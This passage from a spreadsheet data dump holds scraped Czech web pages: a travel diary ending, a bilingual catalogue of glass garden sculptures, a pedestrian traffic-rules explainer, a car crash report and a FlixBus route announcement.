obeliskem. Ale kde je? Cestou jsme ho neviděli. Koukám do mapy, kde jsem si již před chvílí všimla, že jsme odtud kousek minuli vyhlídku. Když se kouknu lépe, právě u vyhlídky je onen obelisk. Je na místě, kde rád sedával a odkud se kochal pohledy do krajiny spisovatel Karel Čapek . Společně jsme vypili jednu plechovku ráno koupeného piva a do ledničky hned dali další. Zdá se však, že je stále docela studené. Pak jdu hledat obelisk. Je to skutečně kousek, ale z cesty od rybníka tam žádná šipka nikoho neposílá. My se kochali pohledem vlevo na rybník a ne vpravo do kopečka. Tak jsme tady snad prošli vše a vše viděli, tak zítra můžeme odjet za další turistikou a dalším poznáváním. Sluníčko zalézá, ochlazuje se. V noci tedy horko už nebude. Než jsme dopili naše 4 plechovky (já vždy 2 deci, Ota 3 deci), je skoro 10 hodin. Poslechli jsme si zprávy z olympiády a také to, že Plzeň ve fotbalové lize porazila Hradec a vede ligu. V autě je 17 stupňů, bude tedy skutečně příjemná noc. Jdeme spát. Autor: Autor: | jircak || Turistika.cz s.r.o.</t>
  </si>
  <si>
    <t>2510</t>
  </si>
  <si>
    <t>1620</t>
  </si>
  <si>
    <t>20241101_243_3377751820_8b53de68b6ff253b53af.html</t>
  </si>
  <si>
    <t>8b53de68b6ff253b53af</t>
  </si>
  <si>
    <t>Křišťálová zahrada | Online katalog výstavy / Behind the Artworks</t>
  </si>
  <si>
    <t>Křišťálová zahrada | Online katalog výstavy / Behind the Artworks Zjistěte, co stojí za vznikem jednotlivých exponátů výstavy Křišťálová zahrada... Find out what inspired the creation of each exhibit in the Crystal Garden exhibition... 1. Rákosnatka Kunratická 🇨🇿 Rybníky v blízkosti Kunratic u Cvikova jsou lemovány hustým rákosím, které ve vycházejícím slunci doslova září krásnými barvami. Tyto přírodní obrazy jsou inspirací pro Rákosnatku Kunratickou. Přírodní zelený odstín je obohacen tzv. uranovým sklem. 🇬🇧 The ponds near Kunratice by Cvikov are bordered by dense reeds, which literally shine with beautiful colors in the rising sun. These natural scenes serve as inspiration for the Rákosnatka Kunratická. The natural green hue is enriched with so-called uranium glass. 2. Rajský strom / The Paradise Tree 🇨🇿 Rajský strom odkazuje na spolupráci skláře Jiřího Pačinka s významnou českou módní návrhářkou Beatou Rajskou , která přišla s myšlenkou vytvořit skleněný strom nesoucí její jméno. Vznikl Rajský strom – Strom poznání dobra a zla. 🇬🇧 The Paradise Tree refers to the collaboration between glass artist Jiří Pačinka and the renowned Czech fashion designer Beata Rajská , who came up with the idea of creating a glass tree bearing her name. The Paradise Tree – the Tree of Knowledge of Good and Evil – was born. 3. Bublinárium 🇨🇿 Bublina ve skle je často vnímána jako nedostatek, závada, nebo problém. Ve sklárně Jiřího Pačinka si však s bublinami rádi hrají. Bubliny se objevují ve sklenicích na víno , vázách, mísách a také, jako v tomto případě, v přírodní krajinné instalaci. Miliardy bublinek jsou vytvořené pomocí chemické sody rozmíchaná ve vodě. 🇬🇧 A bubble in glass is often seen as a defect, flaw, or problem. However, at Jiří Pačinka 's glassworks, they enjoy playing with bubbles. Bubbles appear in wine glasses, vases, bowls, and also, as in this case, in a natural landscape installation. Billions of tiny bubbles are created using soda dissolved in water. Pusťte si video z výroby / Watch the video of the production process 4. Urana 🇨🇿 Zářící instalace vyrobená z unikátního uranem barveného skla – tzv. uranového skla vznikla jako umělecký projekt s názvem Tóny skla pro Výtvarnou Smetanovu Litomyšl. Instalace je doplněna symfonií reálných zvuků skla a sklářské hutě, kterou vytvořili významní čeští hudební skladatelé a hráči na perkuse a bubny Miloš Mio Vacík a Alan Vitouš . Zaposlouchejte se do jejích tónů. Co je uranové sklo? Jedná se o sklo, které díky přidání malého množství uranu (0,1–2 %) získává fluorescentní žluté nebo zelené zbarvení. Tento efekt je nejvíce patrný při nasvícení objektu UV světlem (např. speciální UV svítilnou). Už starověcí Římané zdobili stěny mozaikovými obklady z uranového skla. Od 19. století se vyrábělo ve velkém množství především v Čechách , ale také ve Francii , Anglii , Belgii a USA . 🇬🇧 The glowing installation, made from unique uranium-colored glass—known as uranium glass —was created as an art project titled Tones of Glass for the Visual Smetana Litomyšl. The installation is complemented by a symphony of real glass sounds and glassworks created by renowned Czech composers and percussionists Miloš Mio Vacík and Alan Vitouš . Listen closely to its tones. What is uranium glass? It is glass that, due to the addition of a small amount of uranium (0.1–2%), acquires a fluorescent yellow or green color. This effect is most noticeable when the object is illuminated with UV light (e.g., a special UV flashlight). Ancient Romans used to decorate walls with mosaic tiles made of uranium glass. Since the 19th century, it has been produced in large quantities, primarily in the Czech Republic and France, England , Belgium, and the USA. 5. Skleněnka lávová 🇨🇿 Sklovina je materiál, který připomíná lávu. Sklář jí pomocí píšťaly vdechuje život, dává ušlechtilý tvar a hraje si s ní. To by mu zemské magma nikdy nedovolilo. Zde nad řekou Vltavou se skleněná láva, za doprovodu Smetanovy symfonické básně Vltava dere přímo z hlubin Matky země a míří na své cestě dolů do údolí. Nechte se tóny Vltavy unést i vy. 🇬🇧 Glass is a material that resembles lava. The glassmaker breathes life into it with a blowpipe, giving it a noble shape and playing with it—something earthly magma would never allow. Here, above the Vltava River, the glass lava, accompanied by Smetana’s symphonic poem Vltava , rises directly from the depths of Mother Earth and makes its way down into the valley. Let the tones of the Vltava carry you away as well. 6. Galerie skleněný záhon / Crystal Bed Gallery Šašlik / The Sashlik 🇨🇿 Jeden z návštěvníků Skleněné zahrady v Kunraticích u Cvikova označil tuto instalaci jako "šašlikovník". Jiří Pačinek se tím inspiroval s navlékáním talířků a koulí se rozhodl pokračovat ve své další volné tvorbě. Inspirace jídlem bývá silná, častá a je vlastní každému z nás. 🇬🇧 One of the visitors to the Glass Garden in Kunratice near Cvikov referred to this installation as the "shashlik tree." Jiří Pačinka was inspired by this and decided to continue his work by threading plates and balls as part of his further free artistic creation. Inspiration from food is often strong, frequent, and inherent to all of us. Sasanka ostrá 🇨🇿 Sasanka je jednou z úplně prvních skleněných květin, které vyrostly ve Skleněné zahradě Jiřího Pačinka . Každá nová instalace je vždy naprostým originálem. Každý květ má středový otvor a lze ho pokaždé nasadit na jiný stonek. Nikdy tak neuvidíte dvě stejné sasanky. 🇬🇧 The Sasanka (Anemone) is one of the first glass flowers to blossom in Jiří Pačinek ’s Glass Garden . Each new installation is a unique original, with every flower featuring a central opening that allows it to be placed on different stems. This design ensures that no two Sasanka flowers are ever the same. Aqua 🇨🇿 Voda je pro skláře vedle ohně a země nepostradatelným přírodním elementem, a tak se jako inspirace přelila i do této plastiky. Vzniká naprosto volným a nespoutaným tečením skloviny na kovový stůl. Z něj je poté skleněný květ přenesen na stonek a vzniká nový druh rostliny. 🇬🇧 Water , along with fire and earth, is an indispensable natural element for the glassmaker, and so it has also flowed into this sculpture as inspiration. It is formed by the completely free and unrestrained flow of glass onto a metal table. The glass flower is then transferred to a stem, creating a new kind of plant. Údolnatka Křiš'tálová 🇨🇿 Křišťálové údolí je krajem sklářů a půvabným územím s hlubokými lesy, zurčícími potoky a pískem. Tedy vlastně vším, co sklář potřebuje ke svému životu a práci. Proto se také inspirace tímto nádherným kusem severočeské přírody odráží ve skleněných rostlinách kvetoucích v Křišťálové zahradě. 🇬🇧 Crystal Valley is the land of glassmakers, a charming region with deep forests, babbling streams, and sand. In other words, everything a glassmaker needs for their life and work. That’s why the inspiration from this beautiful part of northern Bohemia is reflected in the glass plants blooming in the Crystal Garden. Skleněnka zářivá 🇨🇿 Spojení skla a světla je fascinující a jedinečné. Žádný jiný materiál nedokáže měnit svou podobu, tvar a dokonce i své okolí díky prostupu světla. Sklo vytváří stínohru, odráží dopadající paprsky a posílá je dál, nebo je naopak vdechne a uzavře do sebe sama. Jedna z teorií objevu skla dokonce hovoří o tom, že před tisíci lety naši dávní prapředci našli v písku cosi blýskavého a neznámého... 🇬🇧 The connection between glass and light is fascinating and unique. No other material can change its form, shape, and even its surroundings through the passage of light. Glass creates a play of shadows, reflects incoming rays, and sends them further, or, conversely, absorbs them and encloses them within itself. One theory about the discovery of glass even suggests that thousands of years ago, our distant ancestors found something shiny and unknown in the sand... Vlnatka vlající 🇨🇿 Sklo na konci píšťal sklářů někdy doslova vlaje jako větve stromů ve větru... Se žhavou hmotou si můžete hrát, nechat ji téct, kapat, anebo prostřednictvím píšťaly vdechnout život. Najednou získá tvar a začne žít svým vlastním životem. Ze skla můžete vytvořit listy, ratolesti, větve stromů, které si jen tak vlají ve větru… 🇬🇧 Glass at the end of the glassblower's pipe sometimes literally flutters like tree branches in the wind... You can play with the hot material, let it flow, drip, or, through the blowpipe, breathe life into it. Suddenly, it takes shape and begins to live its own life. From glass, you can create leaves, twigs, and tree branches that just flutter in the wind... Pusťte si video z výroby / Watch the video of the production process Plazivka kousavá 🇨🇿 Jsou rostliny, které se vinou a pnou nad zemí i pod zemí až několik metrů od středu… Jiří Pačinek si s tímto tématem pohrál. Pro Křišťálovou zahradu vytvořil květinu, která se plazí, jako had, místy se vynoří a místy se zase schovává oku návštěvníka pod zem… Najdete její konec…? Pozor na ní… 🇬🇧 There are plants that twist and climb both above and below the ground, extending several meters from their center... Jiří Pačinka played with this theme. For the Crystal Garden, he created a flower that slithers like a snake, emerging in places and hiding from the visitor's gaze beneath the earth... Can you find its end? Be careful around it... 7. Galerie skleněný záhon 2 / Crystal Bed Gallery 2 Rákosnatka zelená 🇨🇿 Rákosí je nádherná rostlina, která má štíhlý tvar, se kterým si často hraje vítr. Stvoly rákosu buď hrdě ční k nebi, nebo se sklánějí k vodní hladině. Sklář ohřívá rovné části v plamenech pece a ohýbá je přes želenou hranu do různých úhlů. Vzniká tak jedinečný tvar stébel a stvolů. 🇬🇧 Reed is a beautiful plant with a slender form that often plays with the wind. The stalks of reeds either stand proudly toward the sky or bend toward the water's surface. The glassblower heats the straight sections in the flames of the furnace and bends them over an iron edge at various angles. This creates a unique shape for each stem and stalk. Pusťte si video z výroby / Watch the video of the production process Hadovka lesklá 🇨🇿 Tvar a textura skla může najít svou inspiraci také v říši živočichů, v tomto případě ve světě hadů. Sklo se skutečně v určité fázi tvarování tváří a chová jako mrštný had, který se snaží uniknout, nebo naopak zaútočit... Podobu hadí kůže pak povrch skla získá pomocí kovové optické formy. 🇬🇧 The shape and texture of glass can also find inspiration in the animal kingdom, in this case, the world of snakes. At a certain stage of shaping, glass truly behaves like a nimble snake, attempting to escape or, conversely, to strike… The surface of the glass then takes on the appearance of snakeskin through the use of a metal optical mold. Pusťte si video z výroby / Watch the video of the production process Sasanka pálivá 🇨🇿 Sasanka je půvabná květina stejně tak, jako je krásné sklo. To ale pálí, a tak je někdy velice obtížné ho tvarovat. Kdyby jen bylo možné vzít hmotu do holých rukou… Výslednou eleganci sklu tak musí sklář vytvořit s pomocí zvláštního kovového náčiní, které může připomínat chirurgické nástroje. 🇬🇧 The anemone is a charming flower, just as beautiful as glass. But it burns, making it very difficult to shape. If only it were possible to handle the material with bare hands... To achieve the final elegance, the glassmaker must shape the glass using special metal tools, which may resemble surgical instruments. Pusťte si video z výroby / Watch the video of the production process Bublinatka sodová 🇨🇿 Je neuvěřitelné, co dokáže způsobit několik lžic chemické sody rozmíchané ve vodě. Když do tohoto roztoku namočíte žhavou baňku skla, dojde ve zlomku vteřiny k vytvoření miliard malých, či větších bublin, které sklu při kontaktu s paprskem světla dodají magické kouzlo. Každá bublinka se prostě rozzáří! 🇬🇧 It’s incredible what a few spoonfuls of chemical soda dissolved in water can do. When you dip a hot glass bulb into this solution, in a fraction of a second, billions of small or larger bubbles are created, which give the glass a magical charm when they come into contact with a light beam. Each bubble simply sparkles! Volutovka ambrová 🇨🇿 Ambrové sklo je velmi podobné ušlechtilému jantaru, který může být starý až několik set milionů let! Jiří Pačinek s ním často pracuje na svých vázách, které oplétá křišťálovou nití. V tomto případě byl tento zvláštní typ skla použitý ve spojení s přírodními tvary rozvíjejícího se kapradí. 🇬🇧 Amber glass resembles noble amber, which can be up to several hundred million years old! Jiří Pačinek often uses it in his vases, which he decorates with crystal threads. In this case, this special type of glass was used in combination with the natural shapes of unfolding ferns. Pusťte si video z výroby / Watch the video of the production process 8. Betlém / The Nativity Scene 🇨🇿 Skleněný betlém vytvořil Jiří Pačinek volně inspirován dřevěným betlémem z 19. století. Magické prostředí Křišťálové zahrady, a umístění pod mohutným sekvojovcem ho vedlo k trochu jinému ztvárnění… Dává neomezený prostor představivosti a fantazii samotných návštěvníků. 🇬🇧 The glass nativity scene was created by Jiří Pačinek , loosely inspired by a wooden nativity scene from the 19th century. The magical atmosphere of the Crystal Garden and its placement under a massive sequoia led him to a slightly different interpretation... It offers unlimited space for the imagination and fantasy of the visitors themselves. Pusťte si video z výroby / Watch the video of the production process 9. Bambuska / The Bamboo 🇨🇿 Inspiraci pro tuto instalaci našel Jiří Pačinek až v daleké Číně . Po návratu se pokusil jen tak, pro radost, vyrobit bambus ze skla. Ve větru se pohupuje a zvoní a hraje si svou vlastní skleněnou symfonii. 🇬🇧 Jiří Pačinek found the inspiration for this installation in faraway China. After returning, he decided to create bamboo from glass, just for the joy of it. It sways in the wind, ringing and playing its own glass symphony. Pusťte si video z výroby / Watch the video of the production process 10. Ledovka krystalická 🇨🇿 Led je pro skláře fascinující hmota. Vypadá totiž stejně jako sklo, ale nachází se na zcela opačné straně teplotní spektra. Sklovina má přes tisíc stupňů Celsia, led má teplotu mínusovou. Sklovina když chladne, vypadá více a více jako led a zhmotní se do pevného stavu. Led žárem roztaje na vodu, která se odpaří a zmizí. Takové jsou zázraky přírody a její proměny. 🇬🇧 Ice is a fascinating material for glassmakers. It looks just like glass, but is on the opposite end of the temperature spectrum. Glass has a temperature of over a thousand degrees Celsius, while ice is below freezing. As glass cools, it increasingly resembles ice and solidifies. Ice, on the other hand, melts into water when exposed to heat, which then evaporates and disappears. These are the miracles of nature and its transformations. Pusťte si video z výroby / Watch the video of the production process 11. Strom / The Tree 🇨🇿 Strom ze skla viděl Jiří Pačinek poprvé v podání geniálního umělce Bořka Šípka , přítele, se kterým dlouhá desetiletí úzce spolupracoval. Byl to krásný a originální nápad – strom jako umělecký prvek nesoucí křišťálové větve, listy a poupata. S Bořkem Šípkem pak oba skláři tvořili stromy společně a Jiří Pačinek v tom pokračuje i nadále. Touto instalací vzdává svému příteli hold. 🇬🇧 Jiří Pačinka first saw a glass tree in the work of the genius artist Bořek Šípek , a friend with whom he closely collaborated for many decades. It was a beautiful and original idea – a tree as an artistic element carrying crystal branches, leaves, and buds. Together with Bořek Šípek , the two glassmakers created trees, and Jiří Pačinka continues this work to this day. Through this installation, he honors his friend. 12. Leknína blýskavá 🇨🇿 Leknín na blýskající se vodní hladině je inspirací, které nelze odolat. Tato vodní rostlina je tak ušlechtilá a elegantní! Vyloženě láká k tomu, aby se krása reálného květu přenesla do skla. Skleněné lekníny tak vykvetly i v Křišťálové zahradě. 🇬🇧 The water lily on the sparkling water surface is an inspiration that cannot be resisted. This aquatic plant is so noble and elegant! It clearly invites the beauty of the real flower to be captured in glass. Thus, glass water lilies have also bloomed in the Crystal Garden. 13. Střepena horká 🇨🇿 Střepy mají vždy svůj originální tvar, který člověk neovlivní. Sklo spadne na zem a roztříští se na tisíce střepů a střípků. Lákají k tomu, abyste je sebrali a slepili do úplně jiné podoby… Třeba květu. Květy této rostliny sklář Jiří Pačinek nevytvořil slepováním střepů, ale pomocí živelného stříhání žhavého skla vytvaroval do bohatého a členitého trsu, který ozvláštnil výraznou a exotickou barevností. 🇬🇧 The shards always have their original shape, which cannot be influenced by a person. The glass falls to the ground and shatters into thousands of shards and fragments. They beckon you to collect them and glue them together into an entirely different form... perhaps a flower. The flowers of this plant were not created by gluing shards together, but by Jiří Pačinka shaping the hot glass through vigorous cutting, forming it into a rich and intricate clump, which was further enhanced by striking and exotic colors. 14. Květnatec opálový 🇨🇿 Houba jako samostatný přírodní druh poskytuje tak obrovskou a nekonečnou inspiraci. V odborné literatuře je popsáno více než šest miliónů druhů hub a sklář Jiří Pačinek tvoří zcela nové, originální. Tak jako příroda, ani on nikdy nevytvoří dva úplně stejné kusy. 🇬🇧 The mushroom, as a unique natural species, provides an immense and endless source of inspiration. More than six million species of fungi are described in scientific literature, and glassmaker Jiří Pačinek creates entirely new, original ones. Just like nature, he will never create two identical pieces. Pusťte si video z výroby / Watch the video of the production process 15. Adéla von Kunratitz - Pocta Jiřímu Švankmajerovi / Adéla von Kunratitz - A Tribute to Jiří Švankmajer 🇨🇿 Velkou inspirací pro tuto instalaci je český kultovní film "Adéla ještě nevečeřela" a nebezpečná masožravá rostlina. Instalace Adély von Kunratitz je poctou dílu originálního umělce Jiřího Švankmajera. 🇬🇧 A great inspiration for this installation is the Czech cult film "Adela Has Not Had Her Supper Yet" and the dangerous carnivorous plant. The installation Adéla von Kunratitz is a tribute to the work of the original artist Jiří Švankmajer. Pusťte si video z výroby / Watch the video of the production process 16. Mechovka Ryzí 🇨🇿 Ticho a klid, lesní mech s krůpějemi ranní rosy… V nich nečekané překvapení v podobě modrých hub. Každá je jiná, jinak tvarovaná, jinak velká a dohromady vytváří až fantastickou kompozici. 🇬🇧 Silence and calm, forest moss with drops of morning dew... Within it, an unexpected surprise in the form of blue mushrooms. Each one is different, with unique shapes, and sizes, and together they form a truly fantastic composition. Pusťte si video z výroby / Watch the video of the production process 17. Můzy Jiřího Pačinka / The Muses of Jiří Pačinek 🇨🇿 Tyto květiny jsou inspirovány ženami blízkými skláři Jiřímu Pačinkovi… 🇬🇧 These flowers are inspired by the women close to the glass artist Jiří Pačinek … 18. Plameňáci / The Flamingos 🇨🇿 Ušlechtilé a elegantní siluety ptáků na dlouhých štíhlých nohou přímo vybízejí ke ztvárnění ve skle, nemluvě o jejich barvách. Každý exemplář je naprostým a jedinečným originálem, který pak dokáže v hejnu několika desítek kusů vytvořit monumentální kompozici. 🇬🇧 The noble and elegant silhouettes of birds on long, slender legs are just begging to be depicted in glass, not to mention their colors. Each specimen is a perfect and unique original, which, when gathered in a flock of several dozen, can create a monumental composition. Pusťte si video z výroby / Watch the video of the production process Naše webové stránky používají k poskytování služeb, zlepšení návštěvnické zkušenosti, personalizaci obsahu, anonymní analýzu soubory cookies. Používáním těchto webových stránek souhlasíte s použitím souborů cookies. Více zde Namíchejte si svůj pravidelný mix novinek z Botanické *Potvrzením výběru a odesláním udělujete souhlas se zasíláním newsletteru. Návštěva zahrady Poslání Sbírky Rostlin Projekty a expedice Evidence rostlin Index seminum Publikace Pronájmy a svatby Základní info Objednávky Programy Příměstský tábor Ke stažení Botanická zahrada Praha</t>
  </si>
  <si>
    <t>3840</t>
  </si>
  <si>
    <t>4090</t>
  </si>
  <si>
    <t>20241101_244_3243404567_f0fc921a19025b7da58b.html</t>
  </si>
  <si>
    <t>f0fc921a19025b7da58b</t>
  </si>
  <si>
    <t>Chodci na silnicích: Levá, nebo pravá strana? Pravidla, která musí znát každý</t>
  </si>
  <si>
    <t>Chodci na silnicích: Levá, nebo pravá strana? Pravidla, která musí znát každý Radim Šlezingr - 01. 11. 2024 Chodci. Také pro ně platí v silničním provozu pravidla. Deník/Magda Vránová Naše téma Chodci, bruslaři, kočárkáři. Také je můžeme často potkávat na našich silnicích. Někteří z nich si však neuvědomují, že i pro ně pro ně platí zákonná pravidla pro pohyb na komunikacích. Pojďme si připomenou nejdůležitější zásady, jak se jako chodci v provozu pohybovat. reklama VIDEO: Chybující chodci Povinnosti chodce Kola a vozíky A co in-line bruslaři? Pěšky šel někdy po silnici snad každý. A chodí se vlevo, nebo vpravo? Otázka, na kterou neznají odpověď všichni, o čem se mohou řidiči v provozu často snadno přesvědčit. Proto si to pojďme zopakovat. Kdo je chodec a jaké má má povinnosti? Podle platné legislativy je chodcem nejen ten, kdo jde běžnou chůzí po komunikaci, ale také ten, kdo tlačí nebo táhne sáňky, dětský kočárek, vozík pro invalidy nebo ruční vozík, pohybuje se na lyžích nebo kolečkových bruslích anebo pomocí ručního nebo motorového vozíku pro invalidy, vede jízdní kolo, motocykl o objemu válců do 50 cm3, psa a podobně. Chybující chodci: Povinnosti chodce Chodci by se měli na pozemních komunikacích pohybovat (pokud nejsou na chodníku nebo ztezce pro chodce) vždy jen na správné straně vozovky. Kde není chodník, nebo je-li neschůdný, chodí se po levé krajnici. Pokud krajnice chybí nebo je neschůdná, chodí se co nejblíže při levém okraji vozovky. V takovém případě mohou jít maximálně dva chodci vedle sebe (jednotlivě pak za snížené viditelnosti, při zvýšeném provozu a v nebezpečných a nepřehledných úsecích). Jsou však i místa, kam chodec vstoupit vůbec nesmí. Patří mezi ně dálnice, silnici pro motorová vozidla a místa za značkou Zákaz vstupu chodců. Řidiči se mohou setkat na silnicích také s organizovaným útvarem chodců. Ten musí jít vpravo (a pokud tomu nebrání zvláštní okolnosti, při pravém okraji vozovky) a musí být za snížené viditelnosti označen vpředu po obou stranách neoslňujícím bílým světlem a vzadu po obou stranách neoslňujícím červeným světlem. Označení světly může být nahrazeno oděvními doplňky s označením z retroreflexního materiálu. Pokud je blíže než 50 metrů křižovatka s řízeným provozem, přechod pro chodce, místo pro přecházení vozovky, nadchod nebo podchod vyznačený dopravní značkou "„Přechod pro chodce“, „Podchod nebo nadchod“, musí chodec přecházet jen na těchto místech. Na přechodu pro chodce se chodí vpravo. Mimo přechod pro chodce je dovoleno přecházet vozovku jen kolmo k její ose. Chodec smí přecházet vozovku, jen pokud s ohledem na vzdálenost a rychlost jízdy přijíždějících vozidel nedonutí jejich řidiče k náhlé změně směru nebo rychlosti jízdy. Jakmile vstoupí chodec na přechod pro chodce nebo na vozovku, nesmí se tam bezdůvodně zastavovat nebo zdržovat. Podzimní silnice plné zvěře. Řidiči, pozor na nečekané střety, hrozí i ve dne Přečíst článek Také nesmí vstupovat na přechod pro chodce nebo na vozovku, pokud přijíždějí vozidla s právem přednostní jízdy. Důležité je také upozornit, že chodec nemá na přechodu pro chodce absolutní přednost a nesmí vstupovat na přechod pro chodce nebo na vozovku bezprostředně před blížícím se vozidlem. Zároveň musí dát přednost tramvaji. Před vstupem na vozovku se chodec musí přesvědčit, jestli může vozovku přejít, aniž by ohrozil sebe i ostatní účastníky provozu. Kola a vozíky Jestliže chodec vede kolo po chodníku, neměl by jím ohrožovat okolní chodce. V takovém případě je lepší vést kolo blíž k vozovce, čímž zároveň chrání i sám sebe. Vede-li chodec kolo po silnici, pak jde po pravé krajnici nebo při pravém okraji vozovky. Kolo je přitom na straně blíže k vozovce. Při chůzi s kolem musí alespoň jedna ruka držet kolo za řídítka. Tímto způsobem je zajištěno přesné vedení kola, které tak nemůže například najetím na nerovnost náhle změnit směr jízdy a zkřížit tak dráhu jinému chodci nebo dokonce jedoucímu vozidlu. Dálniční známky od ledna 2025 zdraží. Podívejte se, kolik za ně zaplatíte Přečíst článek Tlačí-li nebo táhne-li chodec ruční vozík, jehož šířka není větší jak 60 cm, chodí stejně jako ostatní chodci buď vpravo na chodníku, po levé krajnici, nebo při levém okraji vozovky. U ručního vozíku, jehož šířka převyšuje 60 centimetrů, je situace jiná. Nejedná se už o chodce, ale o řidiče nemotorového vozidla. Takže pro něj platí všechna pravidla, jako pro řidiče. S takovým vozíkem nesmí jít po chodníku. Musí jít nejvíce při pravém okraji vozovky a nesmí být pod vlivem alkoholu . Takový ruční vozík musí být navíc vybaven červenými kulatými odrazkami vyznačujícími jeho obrysovou šířku. Pozor by si měli dát také pejskaři. Vodítko psa nesmí křížit pěší dráhu chodců. Při chůzi se psem na stezce pro chodce a cyklisty je vodítko v jízdní dráze cyklistů předpokladem vzniku nebezpečné nehody. A co in-line bruslaři? „I když se to může zdát paradoxní, jezdci na kolečkových in- line bruslích jsou podle ustanovení § 2, písmeno j) zákona č. 361/2000 Sb., o provozu na pozemních komunikacích a o změnách některých zákonů ve znění pozdějších předpisů chodci. To znamená, že musí dodržovat všechny povinnosti dané tímto zákonem jak obecně všem účastníkům provozu na pozemních komunikacích (§ 4), tak i specifické povinnosti dané chodcům, a to v § 53 zákona 361/2000 Sb.,“ upozorňuje BESIP. reklama</t>
  </si>
  <si>
    <t>20241101_245_3243496895_ed34d7a9508b782218f5.html</t>
  </si>
  <si>
    <t>ed34d7a9508b782218f5</t>
  </si>
  <si>
    <t>Hazardní manévr u Ždírce. Žena předjížděla, skončila převrácená v příkopu</t>
  </si>
  <si>
    <t>Hazardní manévr u Ždírce . Žena předjížděla, skončila převrácená v příkopu „Řidička jela na Chotěboř a ve Ždírci nad Doubravou začala předjíždět pomaleji jedoucí vozidlo před ní ve chvíli, kdy ji již předjížděl nákladní automobil Daf. Došlo ke střetu, osobní auto skončilo po střetu mimo komunikaci v silničním příkopu,“ uvedla policejní mluvčí Michaela Lébrová. Nehody Auto s řidičkou dále narazilo do stromu a skončilo převrácené na boku. Žena se při nehodě zranila a skončila v havlíčkobrodské nemocnici. Provedené dechové zkoušky alkohol u obou řidičů vyloučily. Škoda při nehodě se vyšplhala na 130 tisíc korun. Autor: Jana Kodysová Autor Jana Kodysová</t>
  </si>
  <si>
    <t>3110</t>
  </si>
  <si>
    <t>20241101_246_3243389429_e35a047a39b71b666d33.html</t>
  </si>
  <si>
    <t>e35a047a39b71b666d33</t>
  </si>
  <si>
    <t>FlixBus rozšiřuje spojení: Z Kyjeva přes ČR do Mnichova a z Karlových Varů přes Liberec do Berlína</t>
  </si>
  <si>
    <t>FlixBus rozšiřuje spojení: Z Kyjeva přes ČR do Mnichova a z Karlových Varů přes Liberec do Berlína Newsroom TTG 1. 11. 2024 Přečteno za 3 min. Společnost Flix oznámila dvě nová spojení. V Liberci i Karlových Varech mohou slavit propojení. Prodloužení linky z Berlína do Liberce , Prahy a Karlových Varů bude znamenat možnost premiérového přímého spojení mezi těmito dvěma významným turistickými cíli. Foto: Flix Autobus společnosti UMSE s.r.o. bude vypravován obousměrně zatím v relaci pondělí, čtvrtek–neděle. V Karlových Varech na autobusovém terminálu spoj startuje v 5:35, zastavuje v Praze na letišti v 7:00 a na Florenci v 7:35, pokračuje zastávkou na Černém Mostě (8:15), do Liberce na autobusové nádraží dojede v 9:25, odtud pokračuje do Žitavy (10:00), Budyšína (11:05), Drážďan (12:05, aby dojel na nádraží Berlín Südkreuz v 14:35 a ukončil svoji jízdu na stanici Berlin ZOB ve 14:50. Z Berlína ZOB budou autobusy vyjíždět v 16:00, zastavují na Berlín Südkreuz (16:15), Drážďanech (18:35), Budyšíně (19:40), Žitavě (20:40), Liberci (21:15), v Praze na Černém Mostě (22:30), na Florenci (22:55) a na Letišti (23:30), aby dorazil na terminál v Karlových Varech v 1:05. Celou trasu linky lze zhlédnout zde. FlixBus nadále rozšiřuje nabídku možných spojení. Pro cestující z Karlových Varů se nově otevírá nejen spojení do Liberce a Berlína , ale také přímá linka do Žitavy , Budyšína a Drážďan . Spojení s lužickými městy bude mít nově také Praha . Jde o velmi zajímavé destinace zvlášť nyní, když se blíží období vánočních trhů. „Pro cestující preferující klidnější a menší vánoční trhy bude možnost vyrazit do Žitavy či Budyšína rozhodně námětem k zamyšlení. Budyšínský „Wenzelsmarkt “ (29. 11. – 22. 12. 2024), o němž se první zmínky objevují již ve 14. století, uvítá návštěvníky v historické čtvrti města třpytivým mořem světel a atrakcemi, jako jsou umělecká řemesla, vynikající koláče a vánoční koncerty dechovky. Zejména pro děti bude vždy odpoledne na místě Santa Claus otevírat okénko velkého adventního kalendáře. Vánoční trhy v Žitavě (7.–15. 12. 2024) jsou jako stvořené pro navození sváteční atmosféry. Kromě svařeného vína , perníčků a dalších pochoutek se zde objeví Ježíšek a andělé, hudba a tanec, loutková představení, velkolepá ohňová show a spousta ozdob tzv. moravských hvězd,“ láká na trhy v německých městech mluvčí FlixBusu Tomáš Beránek. Díky lužickosrbské národnostní menšině budou vánoční trhy v Žitavě i Budyšíně českému návštěvníku velmi blízké. „Pokračujeme v propojování destinací napříč Českem i přes hranice. Naši cestující se již mohou dostat z Liberce do Budapešti , z Teplic do Brna , nebo z Frýdku-Místku do Vídně , cestující vyhledávají spojení do velkých center,“ doplňuje záměr dopravce Beránek. Foto: FlixBus Další linka spojí Ukrajinu s Německem Rozšiřuje se také spojení mezi Českem a Ukrajinou . Každodenní spojení Kyjeva s Mnichovem zahrne také hlavní město Prahu . Od 1. listopadu startuje noční spojení Ukrajiny s Německem . Z Kyjeva vyjedou autobusy autobusového dopravce FanLogic UA Sp. Z.o.o. ve 14:10, zastavují ve městech Žitomir (16:30), Rovno (19:10), Lvov Strijskyj (22:10) a Lvov železniční stanice (22:40), aby přejely do Polska , kde staví v Krakově (6:00), Katovicích (7:20) a ve Vratislavi (9:50), další stanicí je Praha Florenc ve 14:05, přejíždějí do Norimberka (17:50), Ingolstadtu (19:10) a končí svoji cestu ve stanici Mnichov ZOB ve 20:20. Opačným směrem vyjede první spoj 3. listopadu z Mnichova v 8:30, zastaví v Ingolstadtu (9:35), Norimberku (10:50), Praze (14:35), Vratislavi (18:50), Katovicích (21:25), Krakově (22:40), pokračuje na Ukrajinu do Lvova Strijskyj (7:05), Lvova železniční stanice (7:35), Rovného (10:35), Žitomiru (13:15) a Kyjeva (15:40). Pro cestující ze států EU bude možné cestovat pouze do ukrajinských destinací, přeprava mezi městy v EU je na této lince prozatím vyloučena. Trasování linky je možné si prohlédnout zde. „Kromě tohoto spojení fungují i naše linky do Poltavy , Lvova a Kyjeva . Kromě nich je v našem prodejním systému zahrnuto také několik dalších spojení, která provozují dopravci bez FlixBus standardu. Nově například dojde pod křídly SVD Trans ke spojení Chebu , Mariánských Lázní , Tachova , Stříbra , Plzně , Rokycan , Prahy , Brna , Olomouce a Ostravy s ukrajinským městem Čerkasy . Jízdenky budou k dispozici na stránkách www.flixbus.cz, v mobilní aplikaci a u smluvních prodejců,“ doplňuje výčet linek směřujících na Ukrajinu Beránek. Autor: Newsroom TTG Rubrika transition_slide Doprava</t>
  </si>
  <si>
